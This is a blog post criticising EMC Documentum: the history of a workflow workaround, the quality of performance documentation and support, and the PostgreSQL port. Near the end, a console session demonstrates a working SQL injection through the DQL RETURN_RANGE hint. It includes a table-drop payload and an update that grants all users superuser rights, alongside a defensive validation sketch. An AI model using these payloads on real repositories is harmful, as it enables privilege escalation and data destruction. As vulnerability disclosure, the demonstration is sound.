The initial idea was to write a continuation of the "Dealing with workflow methods. Part I" and "Dealing with workflow methods. Part II" blogposts, but today I discovered that the topic I wanted to shed light on is already partially, but correctly (sic!), covered in EMC’s documentation. Because this blog claims to contain original content only, I decided not to write that continuation and instead to desecrate Documentum’s corpse, or rather, to share some of my observations.
Well, about three weeks ago my former colleague complained to me about the WF_SKIP_PARALLEL_TASK_EXECUTION parameter in dm_docbase_config. The gist of the claim was the following: enabling WF_SKIP_PARALLEL_TASK_EXECUTION dramatically increases the pauses between two sequential manual workflow activities. Actually, it was expressed in obscene language and was a bit insulting, because I was the person who initiated the appearance of this parameter in Documentum. The story of this parameter is the following: in 2012 we were trying to implement an EDMS based on Documentum in an organisation with more than 50000 employees. That solution had initially been designed for Documentum 5.3 and had never run in a distributed environment; moreover, it contained a lot of workflow templates utilizing the following pattern:
Such a pattern didn’t cause any issues in Documentum 5.3, because in Documentum 5.3 the workflow agent never executed two auto-activities belonging to the same workflow in parallel. In Documentum 6.7 (here I’m not sure about the version, maybe it was 6.6 or 6.5) EMC decided to “improve performance” of the workflow engine and broke a lot of things, one of them being the workflow agent behaviour I described above. As a result, auto-activities in our workflow templates started to compete for the same objects in the database and we started getting a lot of DM_SYSOBJECT_E_VERSION_MISMATCH errors. When we asked support to bring the old behaviour of the workflow agent back, we got the typical excuse that the new behaviour was correct and we were doing something wrong. The suggestion was to use the com.documentum.fc.client.IDfPersistentObject#lock method to prevent DM_SYSOBJECT_E_VERSION_MISMATCH errors. Unfortunately, com.documentum.fc.client.IDfPersistentObject#lock is completely unreliable, and at that time (i.e. in Documentum 6.7) it was not possible to implement controlled locks, so I kept urging support to restore the previous behaviour of the workflow agent.

And finally I discovered a misbehaviour in the workflow engine: when we complete a workflow activity (it doesn’t matter whether it is automatic or not), Content Server creates the next activity and updates the dm_workflow object. So, when we simultaneously complete two workflow activities belonging to the same workflow, we compete for the dm_workflow object and may get a DM_OBJ_MGR_E_VERSION_MISMATCH error. It is obviously a bug, but instead of fixing this bug by putting extra locks on the dm_workflow object, EMC decided to introduce the WF_SKIP_PARALLEL_TASK_EXECUTION parameter, which restores the previous behaviour of the workflow agent. Additionally, I helped them to “fix” the behaviour of the workflow agent in a distributed environment.
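The race described above can be illustrated with a toy model. This is only a sketch under my own assumptions, not Content Server code: `Store`, `VersionMismatch` and the `completed` attribute are hypothetical names, and the version stamp simply stands in for whatever the server checks before raising DM_OBJ_MGR_E_VERSION_MISMATCH.

```python
class VersionMismatch(Exception):
    """Toy stand-in for a DM_OBJ_MGR_E_VERSION_MISMATCH-style error."""


class Store:
    """Hypothetical object store that keeps a version stamp per object."""

    def __init__(self):
        self._rows = {}

    def create(self, object_id, state):
        self._rows[object_id] = (0, dict(state))

    def fetch(self, object_id):
        vstamp, state = self._rows[object_id]
        return vstamp, dict(state)

    def save(self, object_id, expected_vstamp, state):
        current_vstamp, _ = self._rows[object_id]
        # Optimistic check: refuse the save if someone else saved first.
        if current_vstamp != expected_vstamp:
            raise VersionMismatch(object_id)
        self._rows[object_id] = (current_vstamp + 1, dict(state))


def complete_in_parallel(store, workflow_id):
    """Two sessions read the workflow before either of them saves it."""
    vstamp_a, state_a = store.fetch(workflow_id)
    vstamp_b, state_b = store.fetch(workflow_id)
    state_a["completed"] = state_a["completed"] + ["activity_a"]
    state_b["completed"] = state_b["completed"] + ["activity_b"]
    store.save(workflow_id, vstamp_a, state_a)
    store.save(workflow_id, vstamp_b, state_b)  # stale stamp, raises


def complete_serially(store, workflow_id):
    """One activity at a time: every save sees a fresh version stamp."""
    for activity in ("activity_a", "activity_b"):
        vstamp, state = store.fetch(workflow_id)
        state["completed"] = state["completed"] + [activity]
        store.save(workflow_id, vstamp, state)
```

In this model, serialising the completions (roughly what skipping parallel execution does for auto-activities) avoids the stale save, while two users completing manual tasks at the same moment would still hit the parallel path.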
The weird thing here is that they still have not fixed the workflow engine: the WF_SKIP_PARALLEL_TASK_EXECUTION parameter does not prevent DM_OBJ_MGR_E_VERSION_MISMATCH errors in the case of manual activities; moreover, this workaround is now enabled by default in Documentum 7.3.
As for my former colleague, I have formed the opinion that his complaints were groundless: who the heck cares about pauses between manual activities in a production environment? Business users are not robots, they do not complete tasks as quick as thought, so a couple of extra minutes won’t matter. A couple of extra minutes does matter, however, for a QA team or for demonstration/presentation activities. In order to prove this opinion I started googling and found a really useful document authored by EMC (sic!), the xCP1.6 Performance Tuning Guide (if it is unclear: the WF_SKIP_PARALLEL_TASK_EXECUTION parameter disables on-demand processing):
Frankly speaking, this document (the xCP1.6 Performance Tuning Guide) really impressed me. I wouldn’t say that it is perfect, but no doubt it is good: there are just a couple of points which require a more thorough explanation. Some examples:
Why did they suggest “do not configure more than three threads per CPU core”? I presented similar considerations in the Ingestion rates blogpost: there are three services which perform a task (JMS, Content Server and the RDBMS), and while one service waits for a response from another it does not consume CPU. A less obvious statement: “Avoid more than 25 workflow threads for any Content Server”. Why 25? Documentum 6.7 was bundled with a 32-bit JDK; more threads on JMS would require more memory, but a 32-bit JDK has a memory limit of about 3 GB.
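The two quoted rules combine into simple arithmetic. A minimal sketch, where the function name and its parameters are mine and only the numbers 3 and 25 come from the guide:

```python
def suggested_workflow_threads(cpu_cores, threads_per_core=3, per_server_cap=25):
    """Upper bound on workflow threads for one Content Server.

    Applies "no more than three threads per CPU core" and
    "no more than 25 workflow threads for any Content Server".
    """
    if cpu_cores < 1:
        raise ValueError("cpu_cores must be at least 1")
    return min(cpu_cores * threads_per_core, per_server_cap)
```

On a 4-core host the per-core rule is the binding one (12 threads); from 9 cores upwards the per-server cap of 25 takes over.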
Please note that in 2011 xCP 1.6 was the flagship Documentum product, and its performance guide contains 90 pages of really useful information. Now let’s compare it with the flagship products of 2017, xCP2 and D2:
- xCP2.2 Performance Best Practices and Guidelines – 18 pages, primarily containing “never ever implement features we have sold to you” statements and xml configs
- D2 Goblin Performance Best Practice – 15 (I have divided 30 by 2 due to poor document layout) pages of doubtful statements, for example:
So, it doesn’t matter what operating system you are on and how much memory and how many CPU cores you have: you can’t serve more than 300 concurrent sessions with a single Content Server instance. What scaling are they talking about? Moreover, this recommendation is based on the limitations of 32-bit builds of Content Server, which are no longer supported! How many Content Servers do I need to maintain if I want to implement a Documentum solution for an organization with 500000 employees? 10? 20? It is unmanageable!
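For a rough feel of the numbers, here is back-of-the-envelope arithmetic. The 300 sessions per instance is the figure from the guide; the share of employees holding a session at the same time is purely an assumption for illustration, as are the function and parameter names.

```python
import math


def content_servers_needed(employees, concurrent_share, sessions_per_server=300):
    """Number of Content Server instances needed for the assumed load.

    concurrent_share is the assumed fraction of employees that hold
    a session at the same moment (a guess, not a measured value).
    """
    concurrent_sessions = employees * concurrent_share
    return math.ceil(concurrent_sessions / sessions_per_server)
```

With an assumed 1% concurrency, `content_servers_needed(500000, 0.01)` gives 17 instances, which is in the "10? 20?" range; a more realistic share for a busy organization only makes it worse.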
So, what do we have? In 2011 the documentation was acceptable; in 2016 the documentation is extremely poor. Below are my other observations:
In 2012, when we were implementing our “50000 employees” project, we faced plenty of stability and performance issues. Actually, it was hard to imagine that a product with 20 years of history could have such a number of problems, but it did. Nevertheless, close collaboration with support provided some benefits: EMC fixed all showstopper issues (about 20-30% of the overall stability and performance issues) and we went into production. I wouldn’t say that it was a pleasure to work with EMC support: the support guys didn’t understand obvious things and I wasted a lot of time explaining how their product worked. For example, implementing the WF_SKIP_PARALLEL_TASK_EXECUTION feature described earlier took about three months, and initially EMC positioned this feature as a workaround, but now it is enabled by default. Still, it is worth admitting that in 2012 support did work: heavily, counterproductively, but it did work.
It seems that in 2013 EMC decided to cut expenses and started doing weird things. They released D7 only for Linux and Windows. Moreover, there was a statement that EMC would support only the latest patchset within a GA release (i.e. if you are on D6.7 and EMC releases D6.7SP1, D6.7 becomes unsupported), an extremely good prospect if you take into account their release schedule: a new release/patchset every year. Along with dropping support for DB2 and Sybase, EMC revealed their plans for PostgreSQL. And finally, they announced an era of case management and released xCP2, which was completely unreliable and incompatible with other products. Technically, I would say that all those undertakings failed; let’s elaborate. The most doubtful thing there is the PostgreSQL build: it took three years and, according to EMC, 100000 hours of engineering work (as for me, it should not take more than 6 months) to release a fully functional PostgreSQL build, but its purpose is still obscure. Really, I can’t understand EMC’s presuppositions: why did they think that customers who are unable to pay for Oracle or MSSQL would prefer Documentum to the free Alfresco CE? What is the reason not to support EnterpriseDB, which is based on PostgreSQL? Why, after the GA release, do they not want to support the PostgreSQL build?
Try to describe what is going on in this photo:
The answer is the following: EMC brought existing customers together and claimed: you know, we had the following options to cut your database licence fees:
- we might improve performance twofold and, hence, cut your database licence fees by 50%
- we might support your databases and cut your database licence fees by 50%
- implementing both options, we might cut your database licence fees by 75%
but instead of that, if you want to cut your database licence fees, you need to invest in migrating to a database which has no commercial support.
Moreover, I can’t believe that the behaviour below is worth “100000 hours of engineering work”; it seems that Documentum was ported to PostgreSQL by PHP programmers:
    Connecting to Server using docbase DCTM_PSQL
    [DM_SESSION_I_SESSION_START]info: "Session 0102987880002902 started for user dm_bof_registry."

    Connected to Documentum Server running Release 7.3.0000.0214 Linux64.Postgres
    --
    -- Amount of superusers in Documentum repository
    --
    1> select count(*) from dm_user where user_privileges=16
    2> go
    count
    ------------
    1
    (1 row affected)
    --
    -- Demonstration or how Content Server translates DQL query to SQL
    --
    1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
    2> go
    [DM_QUERY_E_CURSOR_ERROR]error: "A database error has occurred during the creation of a cursor (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it; Error while executing the query')."

    1> exec get_last_sql
    2> go
    result
    -------------------------------------------------------------------------------------------
    select all CAST(count(*) as int) from dm_user_sp dm_user order by 1;drop table dm_user_s; 1321 Commit 1321 Commit
    (1 row affected)
    --
    -- Exploitation
    --
    1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')
    2> go
    count
    ------------
    67
    (1 row affected)
    --
    -- Amount of superusers in Documentum repository after exploitation
    --
    1> select count(*) from dm_user where user_privileges=16
    2> go
    count
    ------------
    67
    (1 row affected)
    1>
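The get_last_sql output above suggests that the string passed in the RETURN_RANGE hint ends up in the ORDER BY clause verbatim. I have no access to the Content Server sources, so the following is only a hypothetical sketch of the general problem and of the kind of check that would have stopped it; `naive_sql`, `checked_sql` and the whitelist pattern are illustrative names and choices of mine.

```python
import re

# One ORDER BY item: a column position or a plain identifier,
# optionally followed by ASC or DESC. Anything else is rejected.
_ORDER_BY_ITEM = re.compile(
    r"\s*(\d+|[A-Za-z_][A-Za-z0-9_]*)(\s+(ASC|DESC))?\s*",
    re.IGNORECASE,
)


def naive_sql(base_query, order_by):
    """Appends the caller-supplied string as is: this is the injectable way."""
    return f"{base_query} order by {order_by}"


def checked_sql(base_query, order_by):
    """Appends the ORDER BY clause only if every item passes the whitelist."""
    items = order_by.split(",")
    for item in items:
        if not _ORDER_BY_ITEM.fullmatch(item):
            raise ValueError(f"suspicious ORDER BY item: {item!r}")
    cleaned = ", ".join(item.strip() for item in items)
    return f"{base_query} order by {cleaned}"
```

With the string from the session above, `naive_sql` happily produces a statement containing `drop table dm_user_s`, while `checked_sql` raises `ValueError` because `1;drop table dm_user_s;` is not a column position or identifier.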
xCP2 is also a bizarre marvel: I can’t deny that having a robust platform in the product portfolio is a good thing, but how EMC tried to do that raises a lot of questions. First, if you want to demonstrate the strengths of your platform you must develop a robust OOTB solution: not your xCP 2.2 Tutorial – Concordant Insurance, which covers just 10% of business needs, but a real OOTB solution. Unfortunately, EMC had another opinion:
Where is xCP2? It has been almost 4 years since EMC announced general availability of xCP2, but they still have not adopted it; have you ever seen a better advertisement? Second, all the successful platforms I have ever seen (except MS Word) didn’t start their triumphant march from a GUI: all of them started from a robust API. But EMC had another vision: first we will create a GUI, and after that, maybe, we will create an API. And third, it is always a good idea to neglect wise suggestions (actually, here I’m not sure, because if I think that something should take about 6 months, in real life, from ECD’s perspective, it takes three years) – 2013:
Want to talk about InfoArchive, REST and other technologies? You are welcome 🙂